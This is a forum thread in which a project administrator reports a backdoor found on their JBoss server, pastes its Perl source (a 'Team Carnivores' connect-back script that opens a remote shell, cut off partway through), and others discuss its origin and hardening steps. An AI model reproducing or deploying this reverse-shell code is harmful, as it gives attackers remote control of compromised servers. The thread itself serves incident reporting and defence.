Visit the forum instructions to learn how to post to the forum, enable email notifications, subscribe to a category to receive emails when there are new discussions (like a mailing list), bookmark discussions and to see other tips to get the most out of our forum!
Backdoor detected
  • Someone installed a backdoor on our server, but I have already removed it.

    Contents of the backdoor installed at $JBOSS_HOME/bin/connectback.txt.1 below:

    #!/usr/bin/perl
    use Socket;
    print "Team Carnivores Backdoor\n\n";
    if (!$ARGV[0]) {
    printf "Usage: $0 [Host] <Port>\n";
    exit(1);
    }
    print "[*] Dumping Arguments\n";
    $host = $ARGV[0];
    $port = 80;
    if ($ARGV[1]) {
    $port = $ARGV[1];
    }
    print "[*] Connecting...\n";
    $proto = getprotobyname('tcp') || die("Unknown Protocol\n");
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
    my $target = inet_aton($host);
    if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
    die("Unable to Connect\n");
    }
    print "[*] Spawning Shell\n";
    if (!fork( )) {
    open(STDIN,">&SERVER");

     
  • 5 Comments sorted by
  • Vote Up0Vote Down
    mjnmjn
     
    January 2012
    I'm no Perl expert, but it looks like a completely open backdoor that would allow scripts to be loaded and run.  Nasty.  Nice catch, Elifarely.

    - Mark
     
  • Vote Up0Vote Down
    mjnmjn
     
    January 2012
    I ran a Google search on "Team Carnivores Backdoor".  Not much in the way of results, except this.  "Carnivore" was the project name for software system that would allow the FBI to collection formation.  It is now called DCS1000.  RIPA is a similar kind of thing that monitors internet traffic and email.

    It seems unlikely to me that the FBI is interested in OSE.  More likely a hacker organization is re-using the name.

    - Mark
     
  • I only removed the malicious script. Our VPS provider, Hetzner, has detected it, so we should thank them :)

     
  • Yeah the 'Team Carnivores Backdoor' seems to have been edited in because other versions of the script i found have 'Data Cha0s Connect Back Backdoor' (http://itknowledgeexchange.techtarget.com/Irregular-Expressions/casper-rfi-crack-bot-part-10/) but otherwise identical code, this seems to be the more common version of the code.

    An Important thing to note is that someone has used another exploit to put this here, that means somewhere the system is open and should be closed.

    As an open project i doubt you have many secrets however every effort should be made to protect personal data and to maintain backups in a secure locations - preferable not connected to the internet.

    it's probably nothing (could be dropped by an automated system utilizing known exploits) but with the amount of hacking going around these days it's better to be safe than sorry - change passwords and make sure they strong, that sort of thing.

    -here's a thread that might be of interest from the ubuntu forums; http://ubuntuforums.org/showthread.php?p=9779391
     
  • The most common point for using backdoors is posibility to send a spam. I have that problem on my websites and my host operator isn't so helpful - they just block account.
     

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Login with Facebook Sign In with Google Sign In with OpenID Sign In with Twitter

In this Discussion

Tagged

Loading